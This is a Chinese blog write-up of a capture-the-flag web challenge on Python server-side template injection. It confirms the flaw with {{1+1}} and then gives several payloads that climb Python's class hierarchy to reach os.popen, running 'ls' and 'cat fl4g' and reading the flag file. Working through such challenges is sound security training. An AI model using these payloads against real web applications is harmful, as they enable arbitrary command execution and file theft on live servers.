攻防世界-web-Web_python_template_injection(python模板注入SSTI)

 
更多

进入场景后,显示如下页面

猜测本题存在Python SSTI漏洞,验证一下,在url后面添加{{1+1}},回车显示如下

界面返回2,我们输入的1+1被执行了,说明服务器执行了{{}}里面这一段代码。

关于Python模板注入漏洞,可参考:https://www.cnblogs.com/wjw-zm/p/12741055.html

 

所以本题思路就是先查看当前目录,发现存在一个fl4g文件,然后读取此文件,获得flag。

 

首先,构造Payload1,查看当前目录,发现存在一个fl4g文件。

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

或者
{{
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

 

然后,构造Payload2,读取此文件,获得flag。

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

或者

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

  

打赏

本文固定链接: https://www.cxy163.net/archives/4846 | 绝缘体

该日志由 绝缘体.. 于 2020年09月16日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 攻防世界-web-Web_python_template_injection(python模板注入SSTI) | 绝缘体
关键字: , , , ,

攻防世界-web-Web_python_template_injection(python模板注入SSTI):等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter